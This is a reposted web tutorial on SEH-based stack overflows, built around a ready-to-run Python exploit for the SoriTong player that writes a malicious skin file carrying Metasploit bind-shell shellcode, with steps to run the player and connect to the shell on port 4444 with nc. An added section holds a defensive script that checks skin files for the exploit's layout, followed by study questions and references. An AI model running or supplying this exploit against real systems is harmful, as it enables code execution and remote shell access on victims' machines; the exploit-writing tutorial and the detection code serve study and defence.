exploit - stack overflow with seh
Source: Internet | Editor: 程序博客网 | Time: 2024/05/20 18:44
Demo Prog:
Exploit Code
#!/usr/bin/env python
# -*- coding: utf8 -*-
# Author: Nixawk

# SoriTong reads this skin file at startup; the overflow is triggered by its contents.
# Raw string so the backslashes in the Windows path are not treated as escapes.
fpath = r"C:\Program Files\SoriTong\Skin\Default\UI.txt"

# Binary mode so the payload bytes are written unchanged (text mode would rewrite 0x0A).
with open(fpath, "wb") as f:
    junk = "A" * 584                # filler up to the SEH record
    nseh = "\xEB\x06\x90\x90"       # next pointer: short jump over the handler slot
    pseh = "\x8C\xDD\x01\x10"       # seh callback: !mona seh - 0x1001dd8c
    # bad chars: 00 09 0A 0D

    # windows/shell_bind_tcp - 355 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    # EXITFUNC=seh, InitialAutoRunScript=, AutoRunScript=
    buf = "\x90" * 32               # small NOP sled in front of the shellcode
    buf += "\xd9\xcf\xbd\xa5\x08\x25\xa6\xd9\x74\x24\xf4\x5e\x29"
    buf += "\xc9\xb1\x53\x83\xc6\x04\x31\x6e\x13\x03\xcb\x1b\xc7"
    buf += "\x53\xef\xf4\x85\x9c\x0f\x05\xea\x15\xea\x34\x2a\x41"
    buf += "\x7f\x66\x9a\x01\x2d\x8b\x51\x47\xc5\x18\x17\x40\xea"
    buf += "\xa9\x92\xb6\xc5\x2a\x8e\x8b\x44\xa9\xcd\xdf\xa6\x90"
    buf += "\x1d\x12\xa7\xd5\x40\xdf\xf5\x8e\x0f\x72\xe9\xbb\x5a"
    buf += "\x4f\x82\xf0\x4b\xd7\x77\x40\x6d\xf6\x26\xda\x34\xd8"
    buf += "\xc9\x0f\x4d\x51\xd1\x4c\x68\x2b\x6a\xa6\x06\xaa\xba"
    buf += "\xf6\xe7\x01\x83\x36\x1a\x5b\xc4\xf1\xc5\x2e\x3c\x02"
    buf += "\x7b\x29\xfb\x78\xa7\xbc\x1f\xda\x2c\x66\xfb\xda\xe1"
    buf += "\xf1\x88\xd1\x4e\x75\xd6\xf5\x51\x5a\x6d\x01\xd9\x5d"
    buf += "\xa1\x83\x99\x79\x65\xcf\x7a\xe3\x3c\xb5\x2d\x1c\x5e"
    buf += "\x16\x91\xb8\x15\xbb\xc6\xb0\x74\xd4\x2b\xf9\x86\x24"
    buf += "\x24\x8a\xf5\x16\xeb\x20\x91\x1a\x64\xef\x66\x5c\x5f"
    buf += "\x57\xf8\xa3\x60\xa8\xd1\x67\x34\xf8\x49\x41\x35\x93"
    buf += "\x89\x6e\xe0\x0e\x81\xc9\x5b\x2d\x6c\xa9\x0b\xf1\xde"
    buf += "\x42\x46\xfe\x01\x72\x69\xd4\x2a\x1b\x94\xd7\x45\x80"
    buf += "\x11\x31\x0f\x28\x74\xe9\xa7\x8a\xa3\x22\x50\xf4\x81"
    buf += "\x1a\xf6\xbd\xc3\x9d\xf9\x3d\xc6\x89\x6d\xb6\x05\x0e"
    buf += "\x8c\xc9\x03\x26\xd9\x5e\xd9\xa7\xa8\xff\xde\xed\x5a"
    buf += "\x63\x4c\x6a\x9a\xea\x6d\x25\xcd\xbb\x40\x3c\x9b\x51"
    buf += "\xfa\x96\xb9\xab\x9a\xd1\x79\x70\x5f\xdf\x80\xf5\xdb"
    buf += "\xfb\x92\xc3\xe4\x47\xc6\x9b\xb2\x11\xb0\x5d\x6d\xd0"
    buf += "\x6a\x34\xc2\xba\xfa\xc1\x28\x7d\x7c\xce\x64\x0b\x60"
    buf += "\x7f\xd1\x4a\x9f\xb0\xb5\x5a\xd8\xac\x25\xa4\x33\x75"
    buf += "\x5b\x54\x89\x60\xcc\xcf\x78\xc9\x90\xef\x57\x0e\xad"
    buf += "\x73\x5d\xef\x4a\x6b\x14\xea\x17\x2b\xc5\x86\x08\xde"
    buf += "\xe9\x35\x28\xcb"

    # pad the file out towards 5000 bytes
    nops = "\x90" * (5000 - 588 - len(buf) - len(nseh) - len(pseh))
    payload = junk + nseh + pseh + buf + nops
    f.write(payload)
How to exploit SoriTong?
1. python2 exploit_soritong.py
2. cmd.exe /c SoriTong.exe (or double-click it to run it)
3. nc -v 127.0.0.1 4444
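As an added, defender-side counterpart to the exploit above (example code, not part of the original post), this script triages a SoriTong skin file for the SEH-overwrite layout the exploit writes: 584 bytes of filler reaching the SEH record, a short jump (EB 06) in the nSEH slot, and a long NOP run. The 4096-byte "benign size" threshold and the sample skin contents are assumptions constructed for the example.

```python
# Layout constants taken from the exploit on this page.
SEH_OFFSET = 584                        # filler bytes before the SEH record
NSEH_SHORT_JMP = b"\xEB\x06\x90\x90"    # nSEH slot: jmp +6 padded with NOPs
EXPLOIT_FILE_SIZE = 5000                # size the exploit pads the file to
# Assumption for this example: a real UI.txt skin file is a short text file.
MAX_BENIGN_SIZE = 4096


def longest_run(data: bytes, byte: int) -> int:
    """Length of the longest run of one byte value (0x41 filler, 0x90 NOPs)."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == byte else 0
        best = max(best, cur)
    return best


def triage_skin_file(data: bytes) -> dict:
    """Check a skin file against the SEH-overflow layout used by the exploit."""
    findings = {
        "oversized": len(data) > MAX_BENIGN_SIZE,
        "filler_run": longest_run(data, 0x41) >= SEH_OFFSET,
        "nseh_short_jump": data[SEH_OFFSET:SEH_OFFSET + 4] == NSEH_SHORT_JMP,
        "nop_sled": longest_run(data, 0x90) >= 32,
        # a text skin file should contain only printable ASCII plus tab/CR/LF
        "non_printable": any(b > 0x7E or (b < 0x20 and b not in b"\t\r\n")
                             for b in data),
    }
    findings["suspicious"] = findings["nseh_short_jump"] or (
        findings["oversized"] and (findings["filler_run"] or findings["nop_sled"])
    )
    return findings


# Constructed sample inputs (not captured from a real installation).
BENIGN_SKIN = b"[skin]\r\nname=Default\r\nbackground=bg.bmp\r\n"
# Same layout as the exploit (filler, nSEH, handler pointer, padding) with the
# shellcode replaced by NOPs and the handler address replaced by a placeholder.
MALICIOUS_SKIN = (b"A" * SEH_OFFSET + NSEH_SHORT_JMP + b"BBBB"
                  + b"\x90" * (EXPLOIT_FILE_SIZE - SEH_OFFSET - 8))

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SKIN), ("malicious", MALICIOUS_SKIN)):
        print(name, triage_skin_file(sample))
```

To check a real installation, read the file under the skin directory in binary mode and pass its bytes to triage_skin_file.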
Questions:
- How to find the address used to overwrite the SEH handler pointer?
- How to avoid bad chars?
- Could you exploit a program's stack with SEH?
- How to use the Immunity Debugger mona plugin?
References:
1. https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
2. https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/